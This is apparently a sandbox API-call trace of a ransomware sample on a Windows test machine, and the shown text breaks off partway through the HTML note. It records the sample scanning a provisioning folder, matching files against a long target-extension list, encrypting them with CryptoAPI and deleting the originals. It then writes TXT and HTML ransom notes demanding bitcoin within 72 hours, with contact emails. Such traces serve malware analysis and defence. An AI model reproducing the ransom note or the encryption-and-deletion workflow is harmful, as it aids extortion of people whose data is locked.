	[0171.772] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0171.772] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0171.773] WriteFile (in: hFile=0x39c, lpBuffer=0xfde188*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesWritten=0x18a648*=0x4f0, lpOverlapped=0x0) returned 1
	[0171.776] CloseHandle (hObject=0x39c) returned 1
	[0171.777] CloseHandle (hObject=0x390) returned 1
	[0171.777] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml")) returned 1
	[0171.781] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml")) returned 0
	[0171.781] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa102a24e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa102a24e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa102a24e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0171.781] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0171.782] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0171.782] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\"
	[0171.782] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml"
	[0171.782] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml") returned 100
	[0171.782] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.782] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml") returned 0x64
	[0171.782] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.783] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.783] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml"
	[0171.783] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml") returned 100
	[0171.783] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.783] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0171.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.784] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0171.784] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.784] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.784] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0171.785] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0171.788] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.789] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb198) returned 1
	[0171.793] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.793] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0171.793] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.793] CryptHashData (hHash=0xfb92b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0171.794] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.794] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb92b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9670) returned 1
	[0171.794] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.794] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0171.794] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.795] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0171.795] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.795] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0171.795] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.796] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0171.796] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.796] CryptDestroyHash (hHash=0xfb92b0) returned 1
	[0171.796] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.796] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0171.796] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.797] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.797] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.797] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0171.801] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0171.801] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0171.802] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0171.812] CloseHandle (hObject=0x39c) returned 1
	[0171.812] CloseHandle (hObject=0x390) returned 1
	[0171.813] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml")) returned 1
	[0171.816] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml")) returned 0
	[0171.816] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0171.816] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0171.816] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0171.817] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0171.817] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}"
	[0171.817] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*"
	[0171.817] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.818] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.818] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0171.818] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.819] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0171.819] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0171.823] CloseHandle (hObject=0x388) returned 1
	[0171.824] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.824] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.824] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0171.826] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0171.826] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.826] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0171.826] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0171.827] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0171.827] CloseHandle (hObject=0x388) returned 1
	[0171.827] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.828] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.828] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0171.828] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0171.828] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.829] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do 